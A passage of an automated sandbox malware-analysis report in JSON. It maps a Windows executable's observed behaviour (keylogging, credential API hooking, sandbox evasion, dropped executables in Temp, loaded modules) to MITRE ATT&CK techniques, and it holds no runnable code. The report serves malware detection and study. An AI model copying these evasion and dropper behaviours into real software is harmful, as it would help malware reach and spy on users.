"https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 4, "informative_identifiers_count": 18}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 2, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 11}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 3, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Network Share Discovery", "attck_id": "T1135", "attck_id_wiki": "https://attack.mitre.org/techniques/T1135", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 4, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 3, "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 3, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\golfinfo.ini\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\bucei.exe\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\_vslite.bat\"\n \"bucei.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\bytudy.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" touched \"Property System Both Class Factory\" (Path: \"HKCU\\CLSID\\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" touched \"delegate folder that appears in Users Files Folder\" (Path: \"HKCU\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\SHELLFOLDER\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" touched \"Shell File System Folder\" (Path: \"HKCU\\CLSID\\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\\INPROCSERVER32\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" touched \"Security Manager\" (Path: \"HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"bucei.exe\" called \"CopyFileW\" to copy %TEMP%\\bucei.exe to new location %TEMP%\\bytudy.exe (UID: 00000000-00005888)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" loaded module \"KERNEL32.DLL\" at base 76b80000\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" loaded module \"OLE32.DLL\" at base 75680000\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" loaded module \"CRYPTBASE.DLL\" at base 74e70000\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73c20000\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" loaded module \"ADVAPI32.DLL\" at base 76c60000\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" loaded module \"PROPSYS.DLL\" at base 73ab0000\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" loaded module \"COMCTL32.DLL\" at base 73e10000\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" loaded module \"OLEAUT32.DLL\" at base 76930000\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" loaded module \"SHELL32.DLL\" at base 757e0000\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" loaded module \"CLBCATQ.DLL\" at base 76870000\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73ab0000\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" loaded module \"NTMARTA.DLL\" at base 743e0000\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 771c0000\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" loaded module \"PROFAPI.DLL\" at base 74f90000\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" loaded module \"APPHELP.DLL\" at base 74e20000\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHDOCVW.DLL\" at base 6d7a0000\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHELL32.DLL\" at base 757e0000\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76b80000\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" loaded module \"SETUPAPI.DLL\" at base 766d0000\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" loaded module \"RPCRT4.DLL\" at base 76620000\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75250000\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 769d0000\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" loaded module \"SECUR32.DLL\" at base 74cb0000\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 74fa0000\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 70e60000\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74e20000\n \"bucei.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73c20000\n \"bucei.exe\" loaded module \"DWMAPI.DLL\" at base 736a0000\n \"bucei.exe\" loaded module \"ADVAPI32.DLL\" at base 76c60000\n \"bucei.exe\" loaded module \"KERNEL32.DLL\" at base 76b80000\n \"bucei.exe\" loaded module \"OLE32.DLL\" at base 75680000\n \"bucei.exe\" loaded module \"CRYPTBASE.DLL\" at base 74e70000\n \"bucei.exe\" loaded module \"PROPSYS.DLL\" at base 73ab0000\n \"bucei.exe\" loaded module \"COMCTL32.DLL\" at base 73e10000\n \"bucei.exe\" loaded module \"OLEAUT32.DLL\" at base 76930000\n \"bucei.exe\" loaded module \"SHELL32.DLL\" at base 757e0000\n \"bucei.exe\" loaded module \"CLBCATQ.DLL\" at base 76870000\n \"bucei.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73ab0000\n \"bucei.exe\" loaded module \"NTMARTA.DLL\" at base 743e0000\n \"bucei.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 771c0000\n \"bucei.exe\" loaded module \"PROFAPI.DLL\" at base 74f90000\n \"bucei.exe\" loaded module \"APPHELP.DLL\" at base 74e20000\n \"bucei.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHDOCVW.DLL\" at base 6d7a0000\n \"bucei.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHELL32.DLL\" at base 757e0000\n \"bucei.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76b80000\n \"bucei.exe\" loaded module \"SETUPAPI.DLL\" at base 766d0000\n \"bucei.exe\" loaded module \"RPCRT4.DLL\" at base 76620000\n \"bucei.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75250000\n \"bucei.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 769d0000\n \"bucei.exe\" loaded module \"SECUR32.DLL\" at base 74cb0000\n \"bucei.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 74fa0000\n \"bucei.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 70e60000\n \"bucei.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74e20000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 705b0000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"cmd.exe\" loaded module \"KERNEL32\" at base 76b80000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"cmd.exe\" loaded module \"ADVAPI32.DLL\" at base 76c60000\n \"bytudy.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 705b0000\n \"bytudy.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"bytudy.exe\" loaded module \"KERNEL32\" at base 76b80000\n \"bytudy.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"bytudy.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b640000\n \"bytudy.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73c20000\n \"bytudy.exe\" loaded module \"DWMAPI.DLL\" at base 736a0000\n \"bytudy.exe\" loaded module \"ADVAPI32.DLL\" at base 76c60000\n \"bytudy.exe\" loaded module \"KERNEL32.DLL\" at base 76b80000\n \"bytudy.exe\" loaded module \"DHCPCSVC.DLL\" at base 73100000\n \"bytudy.exe\" loaded module \"IPHLPAPI.DLL\" at base 73410000\n \"bytudy.exe\" loaded module \"RPCRT4.DLL\" at base 76620000\n \"bytudy.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NLAAPI.DLL\" at base 73600000\n \"bytudy.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NAPINSP.DLL\" at base 72ec0000\n \"bytudy.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 771c0000\n \"bytudy.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PNRPNSP.DLL\" at base 72e70000\n \"bytudy.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 74940000\n \"bytudy.exe\" loaded module \"DNSAPI.DLL\" at base 74800000\n \"bytudy.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WINRNR.DLL\" at base 72e60000\n \"bytudy.exe\" loaded module \"WS2_32.DLL\" at base 752c0000\n \"bytudy.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 744a0000\n \"bytudy.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 73340000\n \"bytudy.exe\" loaded module \"RASADHLP.DLL\" at base 714a0000\n \"bytudy.exe\" loaded module \"OLE32.DLL\" at base 75680000\n \"bytudy.exe\" loaded module \"CRYPTBASE.DLL\" at base 74e70000\n \"bytudy.exe\" loaded module \"PROPSYS.DLL\" at base 73ab0000\n \"bytudy.exe\" loaded module \"COMCTL32.DLL\" at base 73e10000\n \"bytudy.exe\" loaded module \"OLEAUT32.DLL\" at base 76930000\n \"bytudy.exe\" loaded module \"SHELL32.DLL\" at base 757e0000\n \"bytudy.exe\" loaded module \"CLBCATQ.DLL\" at base 76870000\n \"bytudy.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73ab0000\n \"bytudy.exe\" loaded module \"NTMARTA.DLL\" at base 743e0000\n \"bytudy.exe\" loaded module \"PROFAPI.DLL\" at base 74f90000\n \"bytudy.exe\" loaded module \"APPHELP.DLL\" at base 74e20000\n \"bytudy.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHDOCVW.DLL\" at base 6d7a0000\n \"bytudy.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHELL32.DLL\" at base 757e0000\n \"bytudy.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76b80000\n \"bytudy.exe\" loaded module \"SETUPAPI.DLL\" at base 766d0000\n \"bytudy.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75250000\n \"bytudy.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 769d0000\n \"bytudy.exe\" loaded module \"SECUR32.DLL\" at base 74cb0000\n \"bytudy.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 74fa0000\n \"bytudy.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 70e60000\n \"bytudy.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74e20000\n \"syzoe.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 705b0000\n \"syzoe.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"syzoe.exe\" loaded module \"KERNEL32\" at base 76b80000\n \"syzoe.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"syzoe.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b640000\n \"syzoe.exe\" loaded module \"KERNEL32.DLL\" at base 76b80000\n \"syzoe.exe\" loaded module \"ADVAPI32.DLL\" at base 76c60000\n \"syzoe.exe\" loaded module \"COMCTL32.DLL\" at base 73e10000\n \"syzoe.exe\" loaded module \"COMDLG32.DLL\" at base 76430000\n \"syzoe.exe\" loaded module \"GDI32.DLL\" at base 75380000\n \"syzoe.exe\" loaded module \"MSIMG32.DLL\" at base 71d30000\n \"syzoe.exe\" loaded module \"OLE32.DLL\" at base 75680000\n \"syzoe.exe\" loaded module \"OLEAUT32.DLL\" at base 76930000\n \"syzoe.exe\" loaded module \"SHELL32.DLL\" at base 757e0000\n \"syzoe.exe\" loaded module \"USER32.DLL\" at base 76d10000\n \"syzoe.exe\" loaded module \"VERSION.DLL\" at base 74410000\n \"syzoe.exe\" loaded module \"WINSPOOL.DRV\" at base 71240000\n \"syzoe.exe\" loaded module \"IMM32.DLL\" at base 75300000\n \"syzoe.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73c20000\n \"syzoe.exe\" loaded module \"CRYPTBASE.DLL\" at base 74e70000\n \"syzoe.exe\" loaded module \"DWMAPI.DLL\" at base 736a0000\n \"syzoe.exe\" loaded module \"UXTHEME.DLL\" at base 73c20000\n \"syzoe.exe\" loaded module \"COMCTL32\" at base 73e10000\n \"syzoe.exe\" loaded module \"RICHED20.DLL\" at base 6b340000\n \"syzoe.exe\" loaded module \"WS2_32.DLL\" at base 752c0000\n \"syzoe.exe\" loaded module \"FWPUCLNT.DLL\" at base 73340000\n \"syzoe.exe\" loaded module \"%WINDIR%\\SYSTEM32\\OLE32.DLL\" at base 75680000\n \"syzoe.exe\" loaded module \"CLBCATQ.DLL\" at base 76870000\n \"syzoe.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSCTF.DLL\" at base 764b0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00002180)\n 